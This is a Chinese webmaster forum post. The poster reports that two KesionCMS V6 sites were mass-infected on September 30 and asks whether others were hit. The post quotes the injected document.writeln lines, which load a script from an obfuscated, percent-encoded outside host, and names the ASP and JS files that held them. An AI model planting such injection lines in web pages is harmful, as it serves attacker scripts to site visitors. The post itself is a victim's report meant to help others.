|
主题:9-30号晚上有被挂马的站长不? [收藏主题] | 转到: |
我有两个科汛V6的站被挂马了,是同天,同时间段,应该是批量植入代码,可能是批量入侵的。 后台很多asp文件都被植入了代码。
不知大家没有挂的? 被挂的第一现象就是网站首页打不开提示,KS_Cls/Kesion.Label.JSCls.asp
这个文件报错,然后找到这个文件,突然发现第一行多了一行这样的代码:
ocument.writeln('<script language="JavaScript" type="text/javascript" src="http://pt%3928.%39%3966.org" id="scr7ipt4828" ><\/script>');
清除掉之后,首页打开,又被植入代码! 经仔细检查,首页无挂马的代码,后来检查首页官方自动加载的一个JS文件:KS_INC/ajax.js
检查发现,亦被植入这种代码:
document.writeln('<script id="scr7ipt5728" type="text/javascript" src="http://pt%3928.%39%3966.org" language="JavaScript" ><\/script>');
可能是我没有按照官方的提示升级吧,我后台在线升级之后,有些是红色的可能没有升级成功,我也就没有去多理会它了,唉。。。
大家有没有这种现象? |
|
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
<上一主题 | 下一主题 > |